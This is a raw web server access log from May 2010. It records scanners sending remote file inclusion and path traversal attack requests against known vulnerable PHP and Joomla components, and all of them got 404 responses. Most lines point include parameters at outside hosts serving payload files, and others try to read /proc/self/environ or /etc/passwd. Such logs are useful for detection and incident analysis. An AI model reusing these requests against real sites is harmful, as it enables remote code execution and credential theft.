212.59.6.16 - - [30/May/2010:05:03:49 -0500] "GET /logs/index.php?option=com_gcalendar&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:05:03:49 -0500] "GET /logs/access_log.1272499200/index.php?option=com_gcalendar&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
109.71.41.45 - - [30/May/2010:05:03:52 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
109.71.41.45 - - [30/May/2010:05:03:53 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
69.175.84.122 - - [30/May/2010:05:04:01 -0500] "GET //bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:04:01 -0500] "GET /logs//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:04:02 -0500] "GET /logs/access_log.1270944000//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:04:04 -0500] "GET /logs//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:04:04 -0500] "GET //bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:04:04 -0500] "GET /logs/access_log.1270944000//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
75.127.70.39 - - [30/May/2010:05:04:05 -0500] "GET /logs/access_log.1272240000//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://temsen.org.tr/forum/Themes/idxx.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
60.234.132.61 - - [30/May/2010:05:04:06 -0500] "GET ///weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.independentpowerlifting.com/images/id.jpg?? HTTP/1.1" 404 310 "-""libwww-perl/5.831"
109.71.41.45 - - [30/May/2010:05:04:10 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
109.71.41.45 - - [30/May/2010:05:04:10 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
109.71.41.45 - - [30/May/2010:05:04:10 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
109.71.41.45 - - [30/May/2010:05:04:10 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
109.71.41.45 - - [30/May/2010:05:04:22 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
109.71.41.45 - - [30/May/2010:05:04:23 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
208.110.132.7 - - [30/May/2010:05:04:58 -0500] "GET /logs/access_log.1262563200//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
208.110.132.7 - - [30/May/2010:05:04:58 -0500] "GET /logs//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
208.110.132.7 - - [30/May/2010:05:04:58 -0500] "GET //bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
208.110.132.7 - - [30/May/2010:05:05:03 -0500] "GET //bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
208.110.132.7 - - [30/May/2010:05:05:03 -0500] "GET /logs//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
208.110.132.7 - - [30/May/2010:05:05:03 -0500] "GET /logs/access_log.1262563200//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
109.71.41.45 - - [30/May/2010:05:05:11 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
67.18.167.170 - - [30/May/2010:05:05:11 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
109.71.41.45 - - [30/May/2010:05:05:11 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
67.18.167.170 - - [30/May/2010:05:05:11 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
67.18.167.170 - - [30/May/2010:05:05:12 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
109.71.41.45 - - [30/May/2010:05:05:17 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
109.71.41.45 - - [30/May/2010:05:05:17 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
208.110.132.7 - - [30/May/2010:05:05:28 -0500] "GET /logs/access_log.1262563200//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
208.110.132.7 - - [30/May/2010:05:05:28 -0500] "GET //bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
208.110.132.7 - - [30/May/2010:05:05:28 -0500] "GET /logs//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
208.110.132.7 - - [30/May/2010:05:05:44 -0500] "GET /logs/access_log.1270944000//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
209.216.201.8 - - [30/May/2010:05:06:03 -0500] "GET /logs/access_log.1274313600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.814"
121.190.102.21 - - [30/May/2010:05:06:05 -0500] "GET /lostpasswd.php?env[include_prefix]=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.190.102.21 - - [30/May/2010:05:06:05 -0500] "GET /logs/access_log.1271548800/lostpasswd.php?env[include_prefix]=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.190.102.21 - - [30/May/2010:05:06:05 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
211.174.62.150 - - [30/May/2010:05:06:16 -0500] "GET /logs/access_log.1271548800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
211.174.62.150 - - [30/May/2010:05:06:16 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.174.62.150 - - [30/May/2010:05:06:16 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
81.23.236.82 - - [30/May/2010:05:06:30 -0500] "GET /logs/access_log.1274227200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
212.59.6.16 - - [30/May/2010:05:06:32 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:06:40 -0500] "GET /logs/access_log.1262563200//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:06:41 -0500] "GET //bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:06:41 -0500] "GET /logs//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:06:43 -0500] "GET //bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:06:43 -0500] "GET /logs//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:06:44 -0500] "GET /logs/access_log.1262563200//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
208.110.132.7 - - [30/May/2010:05:07:00 -0500] "GET /logs/access_log.1270944000//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:07:00 -0500] "GET /logs//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:07:00 -0500] "GET /logs/access_log.1272240000//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:07:00 -0500] "GET //bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
121.190.102.21 - - [30/May/2010:05:07:01 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.190.102.21 - - [30/May/2010:05:07:01 -0500] "GET /logs/access_log.1271548800/lostpasswd.php?env[include_prefix]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.190.102.21 - - [30/May/2010:05:07:01 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:07:02 -0500] "GET /logs/access_log.1262563200//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:07:05 -0500] "GET //bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:07:05 -0500] "GET /logs/access_log.1272240000//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:07:05 -0500] "GET /logs//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:07:07 -0500] "GET /logs/access_log.1262563200//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:05:07:17 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
94.198.96.3 - - [30/May/2010:05:07:17 -0500] "GET /logs/access_log.1274313600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
69.175.84.122 - - [30/May/2010:05:07:17 -0500] "GET /logs/access_log.1270944000//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
109.71.41.45 - - [30/May/2010:05:07:22 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.823"
109.71.41.45 - - [30/May/2010:05:07:23 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
109.71.41.45 - - [30/May/2010:05:07:23 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
69.175.84.122 - - [30/May/2010:05:07:41 -0500] "GET /logs/access_log.1270944000//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
81.23.236.82 - - [30/May/2010:05:07:49 -0500] "GET /logs/access_log.1274227200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
208.110.132.7 - - [30/May/2010:05:08:05 -0500] "GET /logs/access_log.1270944000//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
75.136.121.230 - - [30/May/2010:05:08:06 -0500] "GET //components/com_virtuemart/errors.php?error=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
75.136.121.230 - - [30/May/2010:05:08:06 -0500] "GET /logs//components/com_virtuemart/errors.php?error=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
75.136.121.230 - - [30/May/2010:05:08:06 -0500] "GET /logs/access_log.1271548800//components/com_virtuemart/errors.php?error=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
75.136.121.230 - - [30/May/2010:05:08:28 -0500] "GET /logs//components/com_virtuemart/errors.php?error=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
75.136.121.230 - - [30/May/2010:05:08:28 -0500] "GET //components/com_virtuemart/errors.php?error=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
75.136.121.230 - - [30/May/2010:05:08:28 -0500] "GET /logs/access_log.1271548800//components/com_virtuemart/errors.php?error=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:08:47 -0500] "GET //bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:08:48 -0500] "GET /logs/access_log.1262563200//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:08:50 -0500] "GET /logs//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.174.62.150 - - [30/May/2010:05:09:00 -0500] "GET /logs/access_log.1270771200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
211.174.62.150 - - [30/May/2010:05:09:05 -0500] "GET /logs/access_log.1272412800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
89.35.219.220 - - [30/May/2010:05:10:18 -0500] "GET /logs/access_log.1271203200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.interkor.ro/comtim/forum/idxx.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
89.107.213.98 - - [30/May/2010:05:10:39 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
89.107.213.98 - - [30/May/2010:05:10:39 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
69.175.84.122 - - [30/May/2010:05:10:48 -0500] "GET /logs/access_log.1270944000//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
89.35.219.220 - - [30/May/2010:05:11:01 -0500] "GET /logs/access_log.1271203200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.interkor.ro/comtim/forum/idxx.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
89.35.219.220 - - [30/May/2010:05:11:01 -0500] "GET /logs/access_log.1272240000//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.interkor.ro/comtim/forum/idxx.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
209.126.254.141 - - [30/May/2010:05:11:31 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 294 "-""Mozilla/5.0"
209.126.254.141 - - [30/May/2010:05:11:31 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.126.254.141 - - [30/May/2010:05:11:31 -0500] "GET /logs/access_log.1271635200//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.126.254.141 - - [30/May/2010:05:11:32 -0500] "GET /logs/access_log.1271635200//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-""libwww-perl/5.76"
209.126.254.141 - - [30/May/2010:05:11:32 -0500] "GET /logs/access_log.1271635200//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-"""
209.126.254.141 - - [30/May/2010:05:11:32 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
209.126.254.141 - - [30/May/2010:05:11:32 -0500] "GET /logs/access_log.1271635200//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-"""
209.126.254.141 - - [30/May/2010:05:11:32 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 299 "-"""
209.126.254.141 - - [30/May/2010:05:11:32 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
209.126.254.141 - - [30/May/2010:05:11:32 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-"""
209.126.254.141 - - [30/May/2010:05:11:32 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 294 "-"""
209.126.254.141 - - [30/May/2010:05:11:32 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-"""
89.35.219.220 - - [30/May/2010:05:11:51 -0500] "GET /logs/access_log.1272240000//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.interkor.ro/comtim/forum/idxx.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.18.167.170 - - [30/May/2010:05:12:25 -0500] "GET /logs/access_log.1274313600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
89.107.213.98 - - [30/May/2010:05:12:42 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
209.44.120.2 - - [30/May/2010:05:14:14 -0500] "GET /logs/bbcode_inputs.php?layout=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 306 "-""libwww-perl/5.805"
209.44.120.2 - - [30/May/2010:05:14:14 -0500] "GET /bbcode_inputs.php?layout=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-""libwww-perl/5.805"
69.175.84.122 - - [30/May/2010:05:14:18 -0500] "GET //bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:14:18 -0500] "GET /logs//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:14:18 -0500] "GET /logs/access_log.1272240000//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:14:19 -0500] "GET /logs/access_log.1262563200//bbs//skin/daerew_45galleryGD/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
